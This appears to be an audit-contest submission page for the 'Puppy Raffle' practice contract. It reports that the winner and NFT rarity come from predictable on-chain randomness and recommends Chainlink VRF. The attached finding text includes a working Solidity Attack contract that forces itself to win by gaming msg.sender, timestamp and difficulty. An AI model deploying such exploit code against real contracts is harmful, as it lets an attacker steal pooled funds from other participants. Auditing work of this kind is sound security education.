Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Predictable on-chain randomness lets callers bias both the winner and NFT rarity

sonicthealpha

Root + Impact

Description

The raffle is supposed to choose a random winner and a random puppy rarity after the round ends.
Instead, selectWinner() derives its entropy from msg.sender, block.timestamp, and block.difficulty.
These values are predictable at execution time, and some are partially influenceable by the party submitting the transaction or by the block producer.
A participant can try different caller addresses or timing strategies, and a block builder can selectively include a favorable transaction, biasing both:
- which player index wins the prize pool
- which NFT rarity gets minted

function selectWinner() external {

...

@> uint256 winnerIndex =

@> uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

...

@> uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

if (rarity <= COMMON_RARITY) {

tokenIdToRarity[tokenId] = COMMON_RARITY;

} else if (rarity <= COMMON_RARITY + RARE_RARITY) {

tokenIdToRarity[tokenId] = RARE_RARITY;

} else {

tokenIdToRarity[tokenId] = LEGENDARY_RARITY;

}

Risk

Likelihood:

Callers can directly influence msg.sender.
Block timing and inclusion are not trustless randomness sources for adversarial settings.

Impact:

The raffle outcome is not fair or unpredictable.
Valuable prize distribution and NFT rarity assignment can be manipulated.

Proof of Concept

// 1. Attacker waits until the raffle is eligible to settle

// 2. Attacker simulates candidate outcomes off-chain for different caller addresses or timings

// 3. Attacker sends the transaction only when the computed winnerIndex or rarity is favorable

// 4. A block producer can further bias inclusion timing for profitable outcomes

Recommended Mitigation

For a production raffle, randomness should come from a verifiable external oracle rather than local block data.

-uint256 winnerIndex =

- uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

-uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

+// Use an unbiased external randomness source such as Chainlink VRF

+// and settle the raffle only after the randomness callback is fulfilled.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!